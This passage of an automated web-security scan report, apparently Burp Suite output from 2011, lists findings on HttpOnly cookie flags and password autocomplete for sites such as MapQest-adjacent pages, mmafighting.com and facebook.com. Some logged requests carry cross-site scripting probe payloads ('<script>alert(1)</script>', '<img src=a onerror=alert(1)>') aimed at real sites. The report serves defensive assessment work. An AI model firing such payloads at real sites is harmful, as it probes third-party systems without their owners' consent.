  • c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:40 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /routeplanner HTTP/1.1
Host: www.mapquest.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; tsexpiry=1; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; t_Id=ZGVmYXVsdDpudWxs; c_Id=MjM5OjM5OQ%3D%3D;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 11:28:40 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 10:58:39 GMT
Content-Length: 27353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

11.91. http://www.marketwatch.com/News/Story/Story.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketwatch.com
Path:   /News/Story/Story.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /News/Story/Story.aspx HTTP/1.1
Host: www.marketwatch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: mw5_ads=seen=16; domain=.marketwatch.com; expires=Fri, 06-May-2011 04:59:59 GMT; path=/
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Thu, 05 May 2011 10:58:41 GMT
Content-Length: 50800

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...

11.92. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:41 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 10:58:41 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 85678

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...

11.93. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mmafighting.com
Path:   /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
  • comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 01:57:18 GMT; path=/
Set-Cookie: comment_by_existing=deleted; expires=Wed, 05-May-2010 00:57:17 GMT; path=/
Content-Type: text/html
Content-Length: 63415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...

11.94. http://www.moviefone.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moviefone.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:
  • ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
  • ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
  • GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:48 GMT; path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.moviefone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:48 GMT
Server: Apache/2.2
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Set-Cookie: ipaduser=deleted; expires=Wed, 05-May-2010 10:58:47 GMT; path=/; domain=.moviefone.com
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:48 GMT; path=/
Keep-Alive: timeout=5, max=999999
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 108838


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="eng" xmlns:og="http://openg
...[SNIP]...

11.95. http://www.outblush.com/|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outblush.com
Path:   /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • BIGipServerbargainist_POOL=1509626028.52514.0000; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.outblush.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 11004
Date: Thu, 05 May 2011 10:58:54 GMT
Age: 0
Connection: close
Server: IBSrv 1.0
Set-Cookie: BIGipServerbargainist_POOL=1509626028.52514.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...

11.96. http://www.pageflakes.com/subscribe.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pageflakes.com
Path:   /subscribe.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • .PAGEFLAKESANON=2D84F226422240C5703E911FACF038965CBE1D927E8D870128FEE2134126E0FFA67B97854E5C922518693385A6B4067EECAD3E8ACA7EB04159F98FC62DDAAEDD17CC846A23850CC6D3ABC62F17775E93732C4095377032204EBB2EECD6DB7D97A5A7D8F3F66A2025E10F9515907FEFFC19E8E112D2560C8A6C9DC56D2138543AA99D38430E8FEFEB3EC0A3172C58D2C1E5448F6ADEB1AEB646A3F87830FDD0CA; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /subscribe.aspx HTTP/1.1
Host: www.pageflakes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 May 2011 11:16:00 GMT
Server: Microsoft-IIS/6.0
From: web11
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: t=; path=/
Set-Cookie: .PAGEFLAKESANON=2D84F226422240C5703E911FACF038965CBE1D927E8D870128FEE2134126E0FFA67B97854E5C922518693385A6B4067EECAD3E8ACA7EB04159F98FC62DDAAEDD17CC846A23850CC6D3ABC62F17775E93732C4095377032204EBB2EECD6DB7D97A5A7D8F3F66A2025E10F9515907FEFFC19E8E112D2560C8A6C9DC56D2138543AA99D38430E8FEFEB3EC0A3172C58D2C1E5448F6ADEB1AEB646A3F87830FDD0CA; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 934


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Add feed
...[SNIP]...

11.97. http://www.popeater.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popeater.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:54 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.popeater.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 11:58:54 GMT; path=/
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 60728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xmlns:og="http://opengrap
...[SNIP]...

11.98. http://www.tuaw.com/hub/app-reviews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tuaw.com
Path:   /hub/app-reviews

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:
  • GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:15 GMT; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /hub/app-reviews HTTP/1.1
Host: www.tuaw.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size7b4de%22%3E%3Cscript%3Ealert(1)%3C/script%3E118786fa1f1=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Cache-Control: max-age=60
Set-Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; expires=Thu, 05-May-2011 14:06:15 GMT; path=/
Content-Type: text/html
Content-Length: 32604

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>iPhone and iPod touc
...[SNIP]...

12. Password field with autocomplete enabled
There are 98 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


12.1. http://www.facebook.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • http://www.facebook.com/
The form contains the following password field with autocomplete enabled:
  • reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event)&#123;return false;&#125;.call(this,event)!==false &amp;&amp; Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

12.2. http://www.facebook.com/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.3. http://www.facebook.com/10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /10000082482078341583%3Cimg%20src=a%20onerror=alert(1)%3Eab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/11
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: lsd=hrTlo; path=/; domain=.facebook.com
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.40.55
X-Cnection: close
Date: Thu, 05 May 2011 11:29:43 GMT
Content-Length: 11493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.4. http://www.facebook.com/10000082482078341583

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.5. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div class="menu_login_container"><form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." />
...[SNIP]...
<td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td>
...[SNIP]...

12.6. http://www.facebook.com/1242845259

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259

Issue detail

The page contains a form with the following action URL:
  • https://www.facebook.com/login.php?login_attempt=1
The form contains the following password field with autocomplete enabled:
  • pass

Request

GET /1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
